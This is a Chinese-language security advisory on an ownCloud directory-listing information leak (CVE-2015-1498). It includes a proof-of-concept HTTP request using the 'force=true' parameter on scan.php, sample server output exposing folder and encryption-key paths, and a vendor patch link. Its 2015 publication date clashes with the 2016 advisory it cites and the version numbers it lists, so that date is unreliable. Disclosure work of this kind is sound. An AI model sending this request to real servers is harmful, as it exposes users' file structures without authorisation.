owncloud信息泄露漏洞(CVE-2015-1498)
发布日期:2015-01-07
更新日期:2015-01-08
受影响系统:ownCloud ownCloud <= 8.2.1
ownCloud ownCloud <= 8.1.4
ownCloud ownCloud <= 8.0.9
描述:
CVE(CAN) ID:
CVE-2015-1498
ownCloud是开源文件同步和共享解决方案。
owncloud <= 8.2.1, <= 8.1.4, <= 8.0.9版本的目录列表中存在信息泄露漏洞,此漏洞位于index.php/apps/files/ajax/scan.php的'force'参数中,通过设置该参数值为'true',可使攻击者获取完整目录结构及其所有文件信息。
<*来源:Adam Mariš
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Adam Mariš ()提供了如下测试方法:
GET /index.php/apps/files/ajax/scan.php?force=true&dir=&requesttoken=<VALIDREQUESTTOKEN> HTTP/1.1
Host: [HOST]
Accept: text/event-stream
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [REFERER]
Cookie: [COOKIES]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Server response (shortened):
event: user
data: "[ID]"
event: folder
data: "\/"
event: count
data: 21
event: count
data: 42
event: count
data: 63
event: folder
data: "\/[ID]"
event: folder
data: "\/[ID]\/cache"
event: folder
data: "\/[ID]6\/files"
event: folder
data: "\/[ID]\/files_encryption"
[...]
event: folder
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].zip"
event: folder
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].zip\/OC_DEFAULT_MODULE"
event: folder
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].pptx"
[...]
建议:
厂商补丁:
ownCloud
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://owncloud.org/security/advisory/?id=oc-sa-2016-002浏览次数:2110
严重程度:0(网友投票)
